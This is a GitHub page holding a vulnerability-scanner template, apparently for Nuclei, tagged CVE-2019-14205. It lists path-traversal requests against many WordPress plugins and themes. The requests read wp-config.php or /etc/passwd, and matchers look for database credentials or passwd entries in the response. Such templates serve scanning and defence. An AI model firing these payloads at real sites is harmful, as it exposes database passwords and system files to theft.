-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathCVE-2019-14205.yaml
45 lines (41 loc) · 2.36 KB
/
CVE-2019-14205.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
id: CVE-2019-14205
info:
name: Multiples Wordpress LFI
author: medbsq
severity: critical
# https://www.cvebase.com/cve/2019/14205
requests:
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php"
- "{{BaseURL}}/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download"
- "{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php"
- "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php"
- "{{BaseURL}}/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=../../../../wp-config.php"
- "{{BaseURL}}/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=../../../wp-config.php"
- "{{BaseURL}}/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php"
- "{{BaseURL}}/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php"
- "{{BaseURL}}/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php"
- "{{BaseURL}}/?aam-media=wp-config.php"
- "{{BaseURL}}/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php"
- "{{BaseURL}}/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php"
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=/../wp-config.php"
- "{{BaseURL}}/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd"
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php"
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php"
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
matchers-condition: or
matchers:
- type: word
words:
- "DB_USER"
- "DB_PASSWORD"
condition: and
- type: word
words:
- "root:"
- "bin:x:"
condition: and
part: body